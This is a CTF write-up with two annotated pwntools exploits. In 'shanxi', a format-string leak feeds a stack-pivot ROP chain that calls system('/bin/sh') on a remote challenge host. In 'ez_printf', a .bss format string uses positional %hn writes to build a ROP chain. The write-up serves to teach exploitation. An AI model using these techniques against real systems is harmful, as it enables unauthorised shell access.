shanxi
溢出的字节数不够,利用栈迁移获得足够空间构造rop链
exp如下:
from pwn import *

# CTF writeup exploit for the "shanxi" challenge, as pasted on this page
# (the paste had lost its line breaks; statements are restored one per line,
# code otherwise untouched). What the code below shows:
#   1. menu option 2 evidently feeds user input to a printf-style call, and
#      three positional "%N$p" conversions leak three stack slots;
#   2. the leaks are rebased into a libc base, a PIE code base and a stack
#      address;
#   3. menu option 1 takes a short overflow whose last two qwords (a forged
#      frame pointer and a "leave; ret" gadget) move the stack pointer into
#      the leaked stack region -- the "栈迁移" (stack pivot) the writeup
#      mentions as the way around the small overflow.
# Defender notes: the leak step exists only because ASLR/PIE are on, so the
# root cause is the non-literal format string, which -Wformat
# -Werror=format-security rejects at build time; the overflow itself would
# most likely be caught by the stack protector before "leave; ret" runs
# (assuming the canary sits between the buffer and the saved frame pointer,
# as usual). Inputs containing runs of "%N$p" are a cheap log signature for
# format-string probing.
# Every numeric constant here (-128, -0x30, 0x12eb, 0x1433, 0x127f, 0x101a,
# -0x28) is specific to this binary/libc build and cannot be checked from
# this page -- treat them as writeup-supplied values.

context(log_level='debug')
elf=ELF('./pwn')                                   # unused below; kept as pasted
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')        # NOTE(review): offsets are only right if this matches the remote libc build
p=remote("60.204.130.55",10001)                    # challenge endpoint as given in the writeup

# --- step 1: format-string leak through menu option 2 ---
p.recvuntil(b'choice :\n')
payload=str(2).encode('utf-8')
p.sendline(payload)
p.recv()
p.sendline(b'%37$p%10$p%19$p')                     # three positional pointer reads, no separators
# Each value comes back as "0x" + 12 hex digits (48-bit x86-64 address).
p.recvuntil(b'0x')
libc_start_main=int(p.recv(12),16)-128             # slot 37: presumably the return address into __libc_start_main; -128 -> TODO confirm for this libc
print(hex(libc_start_main))
p.recvuntil(b'0x')
stack_addr=int(p.recv(12),16)-0x30                 # slot 10: a stack pointer, rebased by a writeup-specific -0x30
print(hex(stack_addr))
p.recvuntil(b'0x')
main_addr=int(p.recv(12),16)                       # slot 19: a code pointer inside the PIE image
print(hex(main_addr))

# --- step 2: rebase libc and the binary from the leaks ---
code_base = main_addr - 0x12eb                     # 0x12eb = assumed image offset of the leaked function (the name says main)
offset=libc.symbols['__libc_start_main']
libcbase=libc_start_main-offset
print(hex(libcbase))
sys = libcbase + libc.symbols['system']            # NOTE: shadows the stdlib name `sys`; harmless in this script
binsh = libcbase + next(libc.search(b'/bin/sh'))
pop_rdi_ret=0x1433 + code_base                     # gadget offsets from the writeup; verify against the binary
leave_ret = 0x127f + code_base
ret = 0x101a + code_base                           # computed but never used in the payload below

# --- step 3: overflow through menu option 1, pivoting into the chain ---
p.recvuntil(b'choice :\n')
p.sendline(str(1).encode('utf-8'))
# Four qwords of chain (pop rdi; "/bin/sh"; system; 8 bytes of filler),
# then the value that lands on the saved frame pointer and the return
# address.
payload=p64(pop_rdi_ret)+p64(binsh)+p64(sys)+b'a'*8
payload += p64(stack_addr-0x28) + p64(leave_ret)   # -0x28 is writeup-specific: presumably places rbp just below the chain
p.recvuntil(b'Mountain\n')
p.send(payload)                                    # send(), not sendline(): no trailing newline after the pivot qwords
p.interactive()
ez_printf
考察了在bss段的格式化字符串,原理不复杂,就是有点麻烦
exp如下:
from pwn import *

# CTF writeup exploit for the "ez_printf" challenge, as pasted on this page
# (line breaks restored one statement per line; code otherwise untouched).
# Per the writeup the user-controlled format string lives in .bss. The
# script first leaks three pointers with "%N$p", then spends one prompt
# round ("say?") per write, using "%<count>c" padding followed by
# positional "%hn" to plant 16 bits at a time until a short ROP chain sits
# on the stack.
# Defender notes: this is the textbook printf(user_buf) bug. The effective
# fixes are at the call site -- a literal format string, -Wformat
# -Werror=format-security at build time, and _FORTIFY_SOURCE=2, under which
# glibc aborts on "%n" whenever the format string is in writable memory
# (exactly the .bss case described here). Address-space randomisation only
# forces the leak round; it does not remove the write primitive, and the
# stack protector does not help because nothing is overflowed contiguously.
# Offsets 134, 0x1595, 0x16c3, 0x101a and the argument indexes
# 8/11/49/33/51/63/65 are specific to this binary and cannot be verified
# from this page.

context(log_level='debug')
p=process('./pwn')                                 # local run; this script has no remote target
elf=ELF('./pwn')                                   # unused below; kept as pasted
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')        # NOTE(review): must be the libc the binary actually loads
p.recv()
p.send(b'TokameinE_is_the_best_pwner\x00')        # first prompt; presumably a fixed check string the binary expects
p.recv()

# --- leak round: PIE base, libc base, stack address ---
p.sendline(b'%11$p.%49$p.%8$p.')                   # '.'-separated so each value can be cut out with recvuntil
p.recvuntil(b'0x')
base=int(p.recvuntil(b'.',drop=True),16)-134-0x1595   # slot 11: a code pointer; 134 and 0x1595 are writeup-specific
print("base:"+hex(base))
p.recvuntil(b'0x')
offset=libc.symbols['__libc_start_main']
print(hex(offset))
true=int(p.recvuntil(b'.',drop=True),16)-128       # slot 49: presumably the return address into __libc_start_main; -128 -> TODO confirm
print(hex(true))
libcbase=true-offset
print("libcbase:"+hex(libcbase))
p.recvuntil(b'0x')
stack_addr=int(p.recvuntil(b'.',drop=True),16)     # slot 8: the stack pointer every write target below is derived from
print("stack_addr:"+hex(stack_addr))

# --- addresses derived from the leaks ---
bin_sh=next(libc.search(b'/bin/sh'))+libcbase
print("bin_sh:"+hex(bin_sh))
sys_addr=libc.symbols['system']+libcbase
print("sys_addr:"+hex(sys_addr))
pop_rdi_ret=base+0x16c3                            # gadget offsets from the writeup; verify against the binary
print("pop_rdi_ret:"+hex(pop_rdi_ret))
ret=base+0x101a
print("base:"+hex(ret))                            # misleading label: this prints `ret`, not `base` (runtime string left as pasted)
stack_1=stack_addr+0x10                            # three stack slots relative to the leak; their roles are writeup-specific
stack_2=stack_addr-0x8
stack_3=stack_addr+0x8

# Every round below sends one format string and then waits for the next
# "say?" prompt. A two-write round goes through the pointers held in two
# positional arguments; the if/else orders the writes so the smaller value
# goes first and the second "%<count>c" padding is never negative.
# The rounds alternate between (a) adjusting the low 16 bits of the two
# pointer slots behind args 51 and 33, and (b) writing a 16-bit slice of
# bin_sh / sys_addr through args 65 and 63 -- which appears to be how a
# 48-bit value is placed two bytes at a time. NOTE(review): the 33/51 ->
# 63/65 relationship is inferred from the write sequence, not shown here.

# round 1: low 16 bits of the two pointer slots
p.recvuntil(b'say?\n')
print(hex(stack_1&0xffff))
print(hex(stack_addr&0xffff))
if (stack_1&0xffff)>=(stack_addr&0xffff):
    payload=b'%'+str(stack_addr&0xffff).encode('utf-8')+b'c%51$hn'
    payload+=b'%'+str((stack_1&0xffff)-(stack_addr&0xffff)).encode('utf-8')+b'c%33$hn'
else:
    payload=b'%'+str(stack_1&0xffff).encode('utf-8')+b'c%33$hn'
    payload+=b'%'+str((stack_addr&0xffff)-(stack_1&0xffff)).encode('utf-8')+b'c%51$hn'
p.sendline(payload)

# round 2: bits 0-15 of bin_sh and sys_addr
p.recvuntil(b'say?\n')
print(hex(sys_addr&0xffff))
print(hex(bin_sh&0xffff))
if (sys_addr&0xffff)>=(bin_sh&0xffff):
    payload=b'%'+str(bin_sh&0xffff).encode('utf-8')+b'c%65$hn'
    payload+=b'%'+str((sys_addr&0xffff)-(bin_sh&0xffff)).encode('utf-8')+b'c%63$hn'
else:
    payload=b'%'+str(sys_addr&0xffff).encode('utf-8')+b'c%63$hn'
    payload+=b'%'+str((bin_sh&0xffff)-(sys_addr&0xffff)).encode('utf-8')+b'c%65$hn'
p.sendline(payload)

# round 3: move both pointer slots forward by 2
p.recvuntil(b'say?\n')
print(hex((stack_1+2)&0xffff))
print(hex((stack_addr+2)&0xffff))
if ((stack_1+2)&0xffff)>=((stack_addr+2)&0xffff):
    payload=b'%'+str((stack_addr+2)&0xffff).encode('utf-8')+b'c%51$hn'
    payload+=b'%'+str(((stack_1+2)&0xffff)-((stack_addr+2)&0xffff)).encode('utf-8')+b'c%33$hn'
else:
    payload=b'%'+str((stack_1+2)&0xffff).encode('utf-8')+b'c%33$hn'
    payload+=b'%'+str(((stack_addr+2)&0xffff)-((stack_1+2)&0xffff)).encode('utf-8')+b'c%51$hn'
p.sendline(payload)

# round 4: bits 16-31 of bin_sh and sys_addr
p.recvuntil(b'say?\n')
print(hex((sys_addr>>16)&0xffff))
print(hex((bin_sh>>16)&0xffff))
if ((sys_addr>>16)&0xffff)>=((bin_sh>>16)&0xffff):
    payload=b'%'+str((bin_sh>>16)&0xffff).encode('utf-8')+b'c%65$hn'
    payload+=b'%'+str(((sys_addr>>16)&0xffff)-((bin_sh>>16)&0xffff)).encode('utf-8')+b'c%63$hn'
else:
    payload=b'%'+str((sys_addr>>16)&0xffff).encode('utf-8')+b'c%63$hn'
    payload+=b'%'+str(((bin_sh>>16)&0xffff)-((sys_addr>>16)&0xffff)).encode('utf-8')+b'c%65$hn'
p.sendline(payload)

# round 5: move both pointer slots forward by 4
p.recvuntil(b'say?\n')
print(hex((stack_1+4)&0xffff))
print(hex((stack_addr+4)&0xffff))
if ((stack_1+4)&0xffff)>=((stack_addr+4)&0xffff):
    payload=b'%'+str((stack_addr+4)&0xffff).encode('utf-8')+b'c%51$hn'
    payload+=b'%'+str(((stack_1+4)&0xffff)-((stack_addr+4)&0xffff)).encode('utf-8')+b'c%33$hn'
else:
    payload=b'%'+str((stack_1+4)&0xffff).encode('utf-8')+b'c%33$hn'
    payload+=b'%'+str(((stack_addr+4)&0xffff)-((stack_1+4)&0xffff)).encode('utf-8')+b'c%51$hn'
p.sendline(payload)

# round 6: bits 32-47. One padding count, two "%hn": the same value is
# written through both args, presumably because both libc addresses share
# their top 16 bits (the sys_addr value printed is only for inspection).
p.recvuntil(b'say?\n')
print(hex((sys_addr>>32)&0xffff))
print(hex((bin_sh>>32)&0xffff))
payload=b'%'+str((bin_sh>>32)&0xffff).encode('utf-8')+b'c%65$hn'
p.sendline(payload)

# rounds 7-12: single 16-bit writes, alternating between re-pointing arg 33
# (stack_2 / stack_3) and writing a gadget address through arg 63. Only the
# low 16 bits of pop_rdi_ret / ret are written, so the upper bits of those
# slots must already be correct -- not verifiable from this page. The last
# two rounds repeat the stack_3 / ret pair verbatim; whether that is
# intentional cannot be determined here.
p.recvuntil(b'say?\n')
payload=b'%'+str(stack_2&0xffff).encode('utf-8')+b'c%33$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
payload=b'%'+str(pop_rdi_ret&0xffff).encode('utf-8')+b'c%63$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
payload=b'%'+str(stack_3&0xffff).encode('utf-8')+b'c%33$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
payload=b'%'+str(ret&0xffff).encode('utf-8')+b'c%63$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
payload=b'%'+str(stack_3&0xffff).encode('utf-8')+b'c%33$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
payload=b'%'+str(ret&0xffff).encode('utf-8')+b'c%63$hn'
p.sendline(payload)
p.recv()
p.interactive()